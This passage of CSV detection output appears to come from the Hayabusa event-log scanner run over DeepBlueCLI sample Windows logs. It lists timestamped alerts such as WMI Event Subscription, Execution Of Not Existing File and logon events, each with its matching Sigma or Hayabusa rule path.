Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 
+09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: 
IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 